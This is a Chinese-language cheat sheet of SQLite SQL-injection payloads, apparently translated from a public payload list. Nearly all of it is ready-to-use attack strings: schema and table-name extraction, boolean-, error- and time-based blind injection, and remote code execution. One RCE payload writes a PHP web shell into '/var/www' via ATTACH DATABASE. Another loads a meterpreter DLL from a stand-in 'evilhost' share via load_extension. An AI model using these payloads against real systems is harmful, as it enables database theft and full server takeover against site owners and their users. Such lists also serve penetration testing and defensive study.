| 作者 | 修订时间 |
|---|---|
 |
2023-07-05 21:37:29 |
SQLite 注释
--
/**/
SQLite 版本
select sqlite_version();
基于字符串-提取数据库结构
SELECT sql FROM sqlite_schema
整数/基于字符串-提取表名
SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
使用极限 X+1 偏移 X 提取所有表格。
整数/基于字符串-提取列名
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
对于干净的输出
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
布尔值-计算表数
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
布尔值-枚举表名
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
布尔值-提取信息
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
布尔值-提取信息(排序依据)
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
布尔值-基于错误
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
基于时间
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
使用 SQLite 命令执行远程命令-附加数据库
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
使用 SQLite 命令执行远程命令-Load_extension
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
注意:默认情况下,此组件处于禁用状态